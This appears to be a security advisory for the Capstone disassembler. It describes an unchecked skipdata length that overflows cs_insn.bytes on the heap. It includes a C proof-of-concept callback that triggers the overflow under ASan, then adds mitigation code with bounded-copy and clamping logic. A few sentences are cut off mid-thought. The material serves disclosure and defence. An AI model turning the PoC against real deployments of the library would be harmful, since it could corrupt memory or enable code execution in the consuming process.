Summary

Skipdata length is not bounds-checked, so a user-provided skipdata callback can make cs_disasm/cs_disasm_iter memcpy more than 24 bytes into cs_insn.bytes, causing a heap buffer overflow in the disassembly path.

Details

memcpy(insn_cache->bytes, buffer, skipdata_bytes) writes past the heap allocation for the cs_insn array.
The same logic exists in cs_disasm_iter (cs.c:1537-1549).
exposes this option.

PoC

Steps (tested on macOS, AppleClang 17, ASan):

Build ASan-instrumented library

```sh
cmake -B build-asan -DCMAKE_BUILD_TYPE=Debug \
  -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  -DCMAKE_SHARED_LINKER_FLAGS="-fsanitize=address" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
cmake --build build-asan -j4
```

PoC source (save as poc_overflow.c)

```c
#include <capstone/capstone.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Skipdata callback that asks for far more bytes than cs_insn.bytes (24) can hold. */
static size_t big_skip(const uint8_t *code, size_t code_size, size_t offset, void *user_data)
{
    (void)code; (void)code_size; (void)offset; (void)user_data;
    return 1024; // larger than cs_insn.bytes (24)
}

int main(void)
{
    csh handle;
    if (cs_open(CS_ARCH_WASM, CS_MODE_LITTLE_ENDIAN, &handle) != CS_ERR_OK) {
        return 1;
    }
    cs_opt_skipdata skip = { .mnemonic = ".byte", .callback = big_skip, .user_data = NULL };
    cs_option(handle, CS_OPT_SKIPDATA, CS_OPT_ON);
    cs_option(handle, CS_OPT_SKIPDATA_SETUP, (size_t)&skip);

    uint8_t buf[1024] = {0};
    buf[0] = 0x06; // invalid WASM opcode to force skipdata path
    cs_insn *insn = NULL;
    size_t count = cs_disasm(handle, buf, sizeof(buf), 0, 1, &insn); // triggers memcpy overflow
    if (count > 0) {
        cs_free(insn, count); // only free what cs_disasm actually returned
    }
    cs_close(&handle);
    return 0;
}
```

Build and run

```sh
clang -fsanitize=address -Iinclude poc_overflow.c build-asan/libcapstone.a -o poc_overflow
ASAN_OPTIONS=halt_on_error=0:abort_on_error=0 ./poc_overflow
```

ASan output shows a heap-buffer-overflow in cs_disasm at the memcpy into cs_insn.bytes.

Impact

exploited to corrupt heap memory, likely leading to crash or code execution in the consuming process.
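Added example (not part of the advisory or of Capstone's own code): a model of the memcpy path from Details with a bounded copy in place of the unchecked one, plus a consumer-side wrapper callback that clamps whatever the real skipdata callback returns. The clamping policy, the `model_insn` struct, and the `big_skip_model`/`demo_*` helpers are assumptions made for illustration; the 24-byte capacity is the figure from the advisory.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* Model of the affected field: cs_insn.bytes is 24 bytes (figure from the advisory). */
#define INSN_BYTES_CAP 24
struct model_insn { uint16_t size; uint8_t bytes[INSN_BYTES_CAP]; };
/* Library-side hardening (assumed policy, not Capstone's actual patch): refuse a skip
 * that runs past the remaining input or cs_insn.size (uint16_t), copy at most
 * sizeof(bytes). Returns the number of bytes stored; 0 means the request was refused. */
static size_t store_skipdata(struct model_insn *insn, const uint8_t *buffer,
                             size_t remaining, size_t skipdata_bytes)
{
    if (skipdata_bytes == 0 || skipdata_bytes > remaining || skipdata_bytes > UINT16_MAX)
        return 0;
    size_t n = skipdata_bytes > INSN_BYTES_CAP ? INSN_BYTES_CAP : skipdata_bytes;
    memcpy(insn->bytes, buffer, n);        /* bounded by the destination capacity */
    insn->size = (uint16_t)skipdata_bytes; /* caller still advances by the full skip */
    return n;
}
/* Consumer-side mitigation for unpatched builds: register clamped_skip as the skipdata
 * callback with a clamp_ctx as user_data, so the real callback's result can never
 * exceed the remaining input or the bytes[] capacity. */
typedef size_t (*skip_cb)(const uint8_t *, size_t, size_t, void *);
struct clamp_ctx { skip_cb inner; void *inner_data; };
static size_t clamped_skip(const uint8_t *code, size_t code_size, size_t offset, void *user_data)
{
    struct clamp_ctx *ctx = user_data;
    size_t remaining = offset < code_size ? code_size - offset : 0;
    size_t want = ctx->inner(code, code_size, offset, ctx->inner_data);
    if (want > remaining) want = remaining;           /* never read past the buffer */
    if (want > INSN_BYTES_CAP) want = INSN_BYTES_CAP; /* never overflow bytes[] */
    return want;                                      /* 0 tells Capstone to stop */
}
/* Constructed stand-in for the advisory's big_skip callback: always asks for 1024. */
static size_t big_skip_model(const uint8_t *c, size_t s, size_t o, void *u)
{
    (void)c; (void)s; (void)o; (void)u; return 1024;
}
/* Helpers exercising each path on a constructed 1024-byte buffer. */
static size_t demo_store(size_t remaining, size_t skip)
{
    static uint8_t buf[1024]; struct model_insn insn = {0};
    return store_skipdata(&insn, buf, remaining, skip);
}
static size_t demo_clamp(size_t code_size, size_t offset)
{
    static uint8_t buf[1024]; struct clamp_ctx ctx = { big_skip_model, NULL };
    return clamped_skip(buf, code_size, offset, &ctx);
}
```

With the PoC's 1024-byte request, demo_store(1024, 1024) stores only 24 bytes and demo_clamp(1024, 0) hands Capstone 24 instead of 1024, so the memcpy stays inside cs_insn.bytes.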